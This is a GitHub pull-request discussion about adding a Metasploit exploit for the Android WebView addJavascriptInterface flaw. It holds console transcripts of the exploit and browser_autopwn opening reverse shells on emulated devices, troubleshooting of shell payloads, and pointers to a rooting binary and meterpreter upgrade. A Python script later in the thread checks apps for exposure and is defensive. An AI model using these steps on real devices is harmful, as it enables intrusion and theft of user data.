rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Android < 4.2 WebView addJavascriptInterface RCE #2942

Closed jvennix-r7 closed 10 years ago

jvennix-r7 commented 10 years ago

I was rewiring jduck's module for a side-channel attack on embedded Android WebView components, then noticed this actually gets you a shell on some versions of Android's Browser. So hooray, we now have an android browser exploit. Since it is easy to detect the presence of this vuln from JS code, I added it to browser_autopwn as well. A few other Android third party browsers were also vulnerable (notably baidu and QQ browsers: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/)

wvu commented 10 years ago

Great! Testing!

wvu commented 10 years ago

Hey, @jvennix-r7. Could you link to the specific SDK version?

jvennix-r7 commented 10 years ago

@wvu-r7 sorry my steps are a little brief. Download the latest sdk, run ./sdk/tools/android, then check the Android 4.2.1 checkbox and click install packages. After it installs, Tools->Manage AVDs and create a new "Google APIs - API Level 16" target device. Then run the emulator ./sdk/tools/emulator -avd <avdname>

wvu commented 10 years ago

Ah, I didn't install the packages. Thanks! Android n00b here. :)

todb commented 10 years ago

Hey @joev-r7, it looks to me like this affects in the neighborhood of 70% of all Android devices running as of Feb 2014 (todayish).

Am I reading this right?

http://m.androidcentral.com/android-4x-now-786-active-devices-kitkat-still-under-2

If so, this is kinda huge.

timwr commented 10 years ago

It's not just Android devices < 4.2; apps built with sdk version < 4.2 are still vulnerable on Android 4.4.2. You can verify with Baidu 2.1.0.0 on a > 4.2 device. Also the android browser (e.g. on the XE12) has camera permissions...

PATH=$PATH:/system/bin
id
uid=10008(app_8) gid=10008(app_8) groups=1006(camera),1015(sdcard_rw),1029(private_cache_rw),3001(net_bt_admin),3002(net_bt),3003(inet)

jvennix-r7 commented 10 years ago

@todb it affects <4.2 WebView components (including, I believe, "patched" apps recompiled post 4.2 still running on <4.2 devices). I have no idea how many distributions include a vulnerable Browser app.

jvennix-r7 commented 10 years ago

@timwr okay wow, so even on latest android this affects all apps with WebViews that were never recompiled with sdk version >= 4.2

wvu commented 10 years ago

Works beautifully!

msf > use exploit/android/browser/webview_addjavascriptinterface 
msf exploit(webview_addjavascriptinterface) > exploit 
[*] Exploit running as background job.
msf exploit(webview_addjavascriptinterface) > 
[*] Started reverse handler on 10.6.0.198:4444 
[*] Using URL: http://0.0.0.0:8080/pds2H5RuIEo
[*]  Local IP: http://10.6.0.198:8080/pds2H5RuIEo
[*] Server started.
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:4444 -> 10.6.0.198:51186) at 2014-02-05 11:49:04 -0600

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011

wvu commented 10 years ago

Browser Autopwn:

msf > use auxiliary/server/browser_autopwn 
msf auxiliary(browser_autopwn) > set LHOST 10.6.0.198
LHOST => 10.6.0.198
msf auxiliary(browser_autopwn) > exploit 
[*] Auxiliary module execution completed
msf auxiliary(browser_autopwn) > 
[*] Setup
[*] Obfuscating initial javascript 2014-02-05 12:12:46 -0600
[*] Done in 0.778086804 seconds

[*] Starting exploit modules on host 10.6.0.198...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/qcvLIf
[*]  Local IP: http://10.6.0.198:8080/qcvLIf
[*] Server started.
[snip]
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[snip]
[*] Started reverse handler on 10.6.0.198:6666 
[snip]
[*] Starting the payload handler...

[*] --- Done, found 19 exploit modules

[*] Using URL: http://0.0.0.0:8080/e3mEqsV
[*]  Local IP: http://10.6.0.198:8080/e3mEqsV
[*] Server started.
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV'
[*] 10.6.0.198       browser_autopwn - Handling '/e3mEqsV?sessid=TGludXg6QW5kcm9pZDp1bmRlZmluZWQ6ZW4tVVM6YXJtbGU6Q2hyb21lOnVuZGVmaW5lZDo%3d'
[*] 10.6.0.198       browser_autopwn - JavaScript Report: Linux:Android:undefined:en-US:armle:Chrome:undefined:
[*] 10.6.0.198       browser_autopwn - Reporting: {:os_name=>"Linux", :os_flavor=>"Android", :os_lang=>"en-US", :arch=>"armle"}
[*] 10.6.0.198       browser_autopwn - Responding with 7 exploits
[*] 10.6.0.198       webview_addjavascriptinterface - Serving HTML
[*] Command shell session 1 opened (10.6.0.198:6666 -> 10.6.0.198:60458) at 2014-02-05 12:15:16 -0600

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

export PATH+=":/system/bin"
id
uid=10004(u0_a4) gid=10004(u0_a4) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet)
cat /proc/version
Linux version 2.6.29-gc497e41 (kroot@kennyroot.mtv.corp.google.com) (gcc version 4.4.3 (GCC) ) #2 Thu Dec 8 15:07:43 PST 2011

todb-r7 commented 10 years ago

@wchen-r7 wanna eyeball?

https://github.com/rapid7/metasploit-framework/pull/2942

wvu commented 10 years ago

Code looks great, btw.

jduck commented 10 years ago

Looks good to me. Thanks for following up on this one. I hadn't considered trying it as a straight HTTP module because I was going after the advertising network SDK stuff =) In hindsight a browser module makes more sense anyway since you can use Karmetasploit, DNS hijacking, DNS spoofing, ARP spoofing, etc to get your victims to visit you too =)

<3

jduck commented 10 years ago

PS. It doesn't seem to work against my google glass ..

wchen-r7 commented 10 years ago

@jvennix-r7 Please use the browser exploit server mixin and set the requirement to android, thanks.

jvennix-r7 commented 10 years ago

@wchen-r7 I would like to, but another attack vector for this is injecting the statically-served JS into a webview Component (from mitm position), and browser exploit server kinda subverts this with its detection probe.

jvennix-r7 commented 10 years ago

thinking on it more, I should be able to override BrowserExploitServer's onurirequest and divert the requests for the js file

wchen-r7 commented 10 years ago

If you insist we can land w/ what we have now, not using the mixin isn't a blocker but it's just highly preferred. Let us know what you wanna do.

jvennix-r7 commented 10 years ago

@wchen-r7 adding it now

todb-r7 commented 10 years ago

Hey @jvennix-r7 just for next time can you make sure you refer to jduck as @jduck so he'll get alerted when the PR comes up? It's always nice to have @jduck's eyeballs attuned to whatever Android hotness we have coming up.

jvennix-r7 commented 10 years ago

@todb-r7 doh, will remember to do that next time

jvennix-r7 commented 10 years ago

@wchen-r7 added ExploitServer mixin, re-testing both attack vectors now

jvennix-r7 commented 10 years ago

Okay, shells are still happening, looks good to me

wvu commented 10 years ago

Okay, looks good. +1 for BES.

wvu commented 10 years ago

Landing!

todb-r7 commented 10 years ago

Dear vendors, please up-rev your Androids (and recompile your apps). Signed, The Internet

jduck commented 10 years ago

I agree with @todb-r7. This issue needs a lot more attention from the good guys since the bad guys are likely using it in Sochi !@#!#

PS. Found my embarrassing mistake and confirmed code execution works on my Google Glass XE12 too.

wvu commented 10 years ago

@jduck: Thanks for the update! Yeah, this is some serious (and awesome) stuff. :)

floyd-fuh commented 10 years ago

but hey... that will only pwn >70% of all Android devices O_o http://developer.android.com/about/dashboards/index.html?utm_content=buffer7a7fe&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

wchen-r7 commented 10 years ago

@rsanz88 Not reproducing the issue atm. Do you see any other errors? Like maybe a " uninitialized constant" or something?

todb commented 10 years ago

@rsanz88 please turn your attention to the top four lines of the file. This ruby file will not run on its own.

You can download the Metasploit framework at http://metasploit.com/download.

jjbinx commented 10 years ago

Thanks for posting this. It worked without a hitch on my 4.1.2 emulator. I had no success with other emulators at API levels less than 4.1.2 (tried 4.0.3, and 2.3.3). I also tried on a Samsung running 4.1.2 (both default browser and chrome) without success. Is there a definitive way to check for the vulnerability other than running this script? Is there an easy way to figure out which apps are vulnerable? I know a good starting point is if an app can natively display a web page/html, but not all those apps will support javascript (for example I don't think any of the base email apps enable javascript support). thanks.

jduck commented 10 years ago

You can use http://www.droidsec.org/tests/addjsif/ to do a quick test.

jjbinx commented 10 years ago

Thanks! I got basically the same results; the only difference was that my 4.0.3 emulator reported vulnerable vs having the browser app crash with the ms script. None of the browsers on the physical devices I tested reported as vulnerable (most were 4.1.2 or older).

0xdeadbeefJERKY commented 10 years ago

I'm attempting to run this module on a physical device (not an emulator). The specs meet the requirements. It's outfitted with WebView/WebKit, running 2.3 and JavaScript is enabled, but I keep receiving the following error (even when trying out different payloads):

webview_addjavascriptinterface - Exception handling request: undefined method `[]=' for nil:NilClass

Help?

jduck commented 10 years ago

Devices < 3.x and >= 4.2 are not affected by the browser issue. See http://www.droidsec.org/news/2014/02/26/on-the-webview-addjsif-saga.html
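The exposure rule this thread converges on (jvennix-r7 and timwr above: any WebView bridge is fully exposed when either the device or the app's targetSdkVersion is below 4.2 / API 17; jduck just above: the browser issue is bounded by device version) is easy to get wrong when triaging an app estate, which is what jjbinx asked about. The script below is an added example, written for this page and not part of the Metasploit module or this PR. It takes a decoded AndroidManifest.xml (such as apktool output) and the app's Java source, finds the classes handed to addJavascriptInterface(), and reports which of their methods page JavaScript can call on a given device API level. The manifest, the JsBridge and MainActivity classes, the interface name "bridge" and the device API levels in it are all constructed for the example; the method-scanning regexes are a deliberately simple approximation of Java parsing.

```python
"""Added triage helper for the addJavascriptInterface exposure rule (not the
module's or the project's code).

Rule as stated in the thread:
  * device API < 17 (Android < 4.2): every public method of an object passed
    to addJavascriptInterface() is callable from page JavaScript, including the
    inherited java.lang.Object methods (getClass() is the one the reflection
    escape relies on);
  * device API >= 17 but targetSdkVersion < 17 ("never recompiled"): same
    legacy behaviour;
  * device API >= 17 and targetSdkVersion >= 17: only methods annotated with
    @JavascriptInterface are callable.
"""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ANNOTATION_ENFORCED_FROM = 17  # API level of Android 4.2

# Constructed sample manifest: an app still targeting API 16, and the same
# manifest after re-targeting to 17.
MANIFEST_LEGACY = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.hypothetical">
  <uses-sdk android:minSdkVersion="9" android:targetSdkVersion="16"/>
</manifest>"""
MANIFEST_FIXED = MANIFEST_LEGACY.replace('targetSdkVersion="16"', 'targetSdkVersion="17"')

# Constructed sample source: a bridge with one annotated and one unannotated
# public method, registered by a hypothetical Activity under the name "bridge".
APP_SOURCE = """
public class JsBridge {
    @JavascriptInterface
    public String version() { return "1.0"; }

    public void log(String msg) { Log.d("bridge", msg); }
}

public class MainActivity extends Activity {
    public void onCreate(Bundle saved) {
        WebView webView = new WebView(this);
        webView.getSettings().setJavaScriptEnabled(true);
        webView.addJavascriptInterface(new JsBridge(), "bridge");
    }
}
"""

REGISTER_RE = re.compile(r"\baddJavascriptInterface\s*\(\s*new\s+(\w+)\s*\(")
METHOD_RE = re.compile(
    r"(@JavascriptInterface\s+)?public\s+(?!class\b)[\w<>\[\]]+\s+(\w+)\s*\("
)


def target_sdk_version(manifest_xml: str) -> int:
    """android:targetSdkVersion from a decoded manifest; Android falls back to
    minSdkVersion (default 1) when it is absent."""
    uses_sdk = ET.fromstring(manifest_xml).find("uses-sdk")
    if uses_sdk is None:
        return 1
    target = uses_sdk.get(f"{{{ANDROID_NS}}}targetSdkVersion")
    if target is None:
        target = uses_sdk.get(f"{{{ANDROID_NS}}}minSdkVersion", "1")
    return int(target)


def registered_bridges(java_source: str) -> list:
    """Class names of objects passed to addJavascriptInterface(new X(), ...)."""
    return REGISTER_RE.findall(java_source)


def class_body(java_source: str, class_name: str) -> str:
    """Text between the outer braces of `class <class_name> {...}`."""
    m = re.search(r"\bclass\s+" + re.escape(class_name) + r"\b[^{]*\{", java_source)
    if m is None:
        return ""
    depth, start = 1, m.end()
    for i in range(start, len(java_source)):
        depth += {"{": 1, "}": -1}.get(java_source[i], 0)
        if depth == 0:
            return java_source[start:i]
    return java_source[start:]


def bridge_methods(class_source: str) -> dict:
    """Public method name -> whether it carries @JavascriptInterface."""
    return {m.group(2): m.group(1) is not None for m in METHOD_RE.finditer(class_source)}


def legacy_rules_apply(target_sdk: int, device_api: int) -> bool:
    """True when the pre-4.2 'every public method is exposed' behaviour holds."""
    return device_api < ANNOTATION_ENFORCED_FROM or target_sdk < ANNOTATION_ENFORCED_FROM


def assess(manifest_xml: str, java_source: str, device_api: int) -> dict:
    """Reachable bridge methods and whether a registered bridge is exposed
    under the legacy rules (the condition the reflection escape needs)."""
    target = target_sdk_version(manifest_xml)
    bridges = registered_bridges(java_source)
    methods = {}
    for cls in bridges:
        methods.update(bridge_methods(class_body(java_source, cls)))
    legacy = legacy_rules_apply(target, device_api)
    if legacy:
        reachable = sorted(methods)  # plus inherited Object methods such as getClass()
    else:
        reachable = sorted(n for n, annotated in methods.items() if annotated)
    return {"target_sdk": target, "device_api": device_api, "bridges": bridges,
            "reachable": reachable, "at_risk": legacy and bool(bridges)}


if __name__ == "__main__":
    for manifest, device in ((MANIFEST_LEGACY, 19), (MANIFEST_FIXED, 19), (MANIFEST_FIXED, 16)):
        print(assess(manifest, APP_SOURCE, device))
```

Run against the constructed inputs, the re-targeted app on a 4.4 device exposes only version(), the un-recompiled app on the same device exposes everything, and the re-targeted app on a 4.1 device is exposed again, which is exactly the "patched app on an unpatched device" case jvennix-r7 raises. For a real estate the inputs would come from apktool's decoded manifest and a decompiler's output, and anything the scanner misses (bridges created through a variable or a factory rather than `new X()`) should be checked by hand.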

0xdeadbeefJERKY commented 10 years ago

I'm now attempting to pop a reverse shell on a device running 4.1.1, but I'm still receiving zero output after the exploit HTML is being served to the device. I've tried every possible payload with no noticeable results.

todb-r7 commented 10 years ago

@TheBananaStand See @jduck's link above -- you may be running into a mitigation by the phone manufacturer or carrier.

0xdeadbeefJERKY commented 10 years ago

That was my initial thought, but after working on resolving the issue for a while longer, I was able to successfully get a Linux shell using the TCP bind payloads. For some reason though, I'm unable to interact with them appropriately (similar to a meterpreter shell) and I'm still unable to pop a shell using a reverse TCP payload. I've tried testing the functionality by creating a malicious APK that contains a reverse TCP shell (via msfpayload) and installing it directly onto the device in order to connect back to my machine, but that has failed as well. Maybe there is a security mechanism preventing these callback connections from establishing.

chrisdavis925 commented 10 years ago

@TheBananaStand can you give an update on any progress? I have the same result. I have an older device running 4.03 as well as a virtual Android 4.0.3 device running, and both do not respond properly as I expect for this exploit.

Metasploit console returns that a new session is started for each device, but any commands passed do not work. I cannot get it to return any response, either.

Any ideas?

Perhaps you can comment further on the success you had with "TCP bind payloads" ?

0xdeadbeefJERKY commented 10 years ago

The bottom line is that reverse TCP shell payloads are not being delivered correctly. The only payload that seems to be working are TCP bind shells. However, when the exploit succeeds and a session is spawned, the interaction with that session is minimal and essentially useless, as seen below:

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

ls
: [1]: ls: not found
echo "wtf"
wtf
cd system
cd asdf
: [4]: cd: /system/asdf: No such file or directory

jvennix-r7 commented 10 years ago

@TheBananaStand, use /system/bin/ls as the android shell does not have /system/bin in its $PATH. It is strange that reverse TCP is not working correctly, that is what I usually use for testing. Are you sure LHOST is accessible from the device?

You can also try the branch here: https://github.com/rapid7/metasploit-framework/pull/3086

Which will add android meterpreter support and uses a different stager.

wvu commented 10 years ago

export PATH+=":/system/bin"
export PATH="$PATH:/system/bin"
PATH="$PATH:/system/bin"
export PATH

chrisdavis925 commented 10 years ago

Thanks @jvennix-r7 - that's what I need to get the shell to respond.

Has anyone figured out a root exploit that could be done on 4.x devices using the shell generated? It seems to me that there are a lot of commands that couldn't be executed with this shell. (For example, the am and pm commands don't respond; neither do setprop or getprop.)

timwr commented 10 years ago

@chrisdavis925 you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script: https://github.com/timwr/metasploit-framework/commit/1775f15c46224f268aacd4634e960308e54a9509

chrisdavis925 commented 10 years ago

@timwr

Wow, yeah that is totally crazy. I am going to try this out tonight and report back if I was able to get this to work. I tried other android root binary exploits but they didn't work, so I'll see if the one you linked does.

Can you confirm that the expected result after executing the android_run_root binary on the target device is that the shell that is already opened by the WebView addJavascriptInterface will automatically elevate to root?

ghost commented 10 years ago

Hello, I want to install an apk like this: http://drops.wooyun.org/papers/548

But if I don't understand that: you can drop and run this https://github.com/android-rooting-tools/android_run_root_shell binary to get root on a lot of devices, and then, for example, upgrade to meterpreter with this script: timwr@1775f15

With the command ls I get the directory of my android tablet. That's ok. But how to start adb? I have opened a session with the browser autopwn ....

Thanks and best regards

todb commented 10 years ago

hi @tompom1 -- this isn't really a support forum. It's a development forum for a particular exploit.

You would be better off with your question directed at, say, #droidsec on Freenode IRC, or failing that, ##security on Freenode.


ghost commented 10 years ago

Hello

At Freenode IRC I get no answer??? Perhaps you can help me again.

I use KALI Linux and an Android 4.1.2 Tablet for my test. I want to install an App like this: http://drops.wooyun.org/papers/548

At Kali Linux I use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN).

msf exploit(webview_addjavascriptinterface) >
[*] 192.168.178.23 webview_addjavascriptinterface - Gathering target information.
[*] 192.168.178.23 webview_addjavascriptinterface - Sending response HTML.
[*] 192.168.178.23 webview_addjavascriptinterface - Serving exploit HTML
[*] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000

msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1...

export PATH=/system/bin:$PATH
ls -al
drwxr-xr-x root     root              2014-05-15 16:56 acct
-rw-r--r-- root     root          332 2014-05-15 16:56 boot.txt
drwxrwx--x system   cache             2014-05-10 09:22 cache
dr-x------ root     root              2014-05-15 16:56 config
lrwxrwxrwx root     root              2014-05-15 16:56 d -> /sys/kernel/debug
drwxrwx--x system   system            2014-05-12 09:41 data
-rw-r--r-- root     root          129 2014-05-15 16:56 default.prop
drwxr-xr-x root     root              2014-05-15 17:12 dev
drwxr-xr-x radio    radio             2014-05-09 13:55 efs
lrwxrwxrwx root     root              2014-05-15 16:56 emmc -> /storage/sdcard1
lrwxrwxrwx root     root              2014-05-15 16:56 etc -> /system/etc
-rwxr-x--- root     root       105292 2014-05-15 16:56 init
-rwxr-x--- root     root         1107 2014-05-15 16:56 init.cm.rc
-rwxr-x--- root     root         2344 2014-05-15 16:56 init.goldfish.rc
-rwxr-x--- root     root         5171 2014-05-15 16:56 init.p1-common.rc
-rwxr-x--- root     root         5389 2014-05-15 16:56 init.p1.rc
-rwxr-x--- root     root          936 2014-05-15 16:56 init.p1.usb.rc
-rwxr-x--- root     root        17862 2014-05-15 16:56 init.rc
-rwxr-x--- root     root         1637 2014-05-15 16:56 init.trace.rc
-rwxr-x--- root     root         3915 2014-05-15 16:56 init.usb.rc
-rw-r--r-- root     root         1664 2014-05-15 16:56 lpm.rc
drwxrwxr-x root     system            2014-05-15 16:56 mnt
dr-xr-xr-x root     root              1970-01-01 00:00 proc
drwxr-xr-x root     root              2014-05-09 13:55 radio
drwxr-x--- root     root              2014-05-15 16:56 sbin
lrwxrwxrwx root     root              2014-05-15 16:56 sdcard -> /storage/sdcard0
d---r-x--- system   sdcard_r          2014-05-15 16:56 storage
drwxr-xr-x root     root              2014-05-15 16:56 sys
drwxr-xr-x root     root              2014-05-09 13:56 system
-rw-r--r-- root     root          272 2014-05-15 16:56 ueventd.goldfish.rc
-rw-r--r-- root     root         2035 2014-05-15 16:56 ueventd.p1.rc
-rw-r--r-- root     root         5075 2014-05-15 16:56 ueventd.rc
lrwxrwxrwx root     root              2014-05-15 16:56 vendor -> /system/vendor

I want to copy some pictures to my KALI system but there is the problem:

dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
/dev/sdc: cannot open for write: Permission denied

Or I want to run adb (no device!):

adb devices

Can someone help or explain me how to do this?

todb commented 10 years ago

You are opening a network shell but then expecting to have local shell access. This won't work.

You don't need an exploit if you just intend to use normal local shell commands (like adb and dd) - you just need to enable USB debugging and connect that way normally.

The android devices I've used this exploit on have curl available, so I use that to transfer files and stuff.